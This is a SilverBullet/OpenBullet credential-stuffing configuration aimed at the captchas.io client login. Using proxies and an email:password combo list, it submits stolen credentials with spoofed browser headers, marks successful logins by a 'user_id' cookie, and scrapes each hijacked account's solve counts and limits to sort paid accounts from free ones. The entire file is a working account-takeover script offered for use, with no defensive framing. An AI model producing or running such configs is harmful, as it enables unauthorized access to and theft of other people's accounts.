[SETTINGS]
{
  "Name": "captcha.io",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-12-28T22:54:10.5949158+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "captcha",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://app.captchas.io/clients/v2/login?ref=" 
  CONTENT "email=<USER>&password=<PASS>&submit=Login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: app.captchas.io" 
  HEADER "Origin: https://app.captchas.io" 
  HEADER "Referer: https://app.captchas.io/clients/v2/login?ref=" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#HITS_FAILS KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Oh snap!" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "user_id" 

#CAPTURE REQUEST GET "https://app.captchas.io/clients/v2/index" 
  
  HEADER "Host: app.captchas.io" 
  HEADER "Referer: https://app.captchas.io/clients/v2/solves" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#Daily_Solves PARSE "<SOURCE>" LR "data-plugin=\"counterup\" id=\"solves\">" "</span></h2>" CreateEmpty=FALSE -> CAP "Daily Solves" 

#Active_Threads PARSE "<SOURCE>" LR "plugin=\"counterup\" id=\"threads\">" "</h2>" CreateEmpty=FALSE -> CAP "Active Threads" 

#Solves_Limit PARSE "<SOURCE>" LR "plugin=\"counterup\" id=\"solveslimit\">" "</h2>" CreateEmpty=FALSE -> CAP "Solves Limit" 

#FREE KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Daily Solves>" EqualTo "0" 
    KEY "<Active Threads>" EqualTo "0" 
    KEY "<Solves Limit>" EqualTo "0" 
  KEYCHAIN Success OR 
    KEY "<Solves Limit>" NotEqualTo "0" 
    KEY "<Active Threads>" NotEqualTo "0" 
    KEY "<Daily Solves>" NotEqualTo "0" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

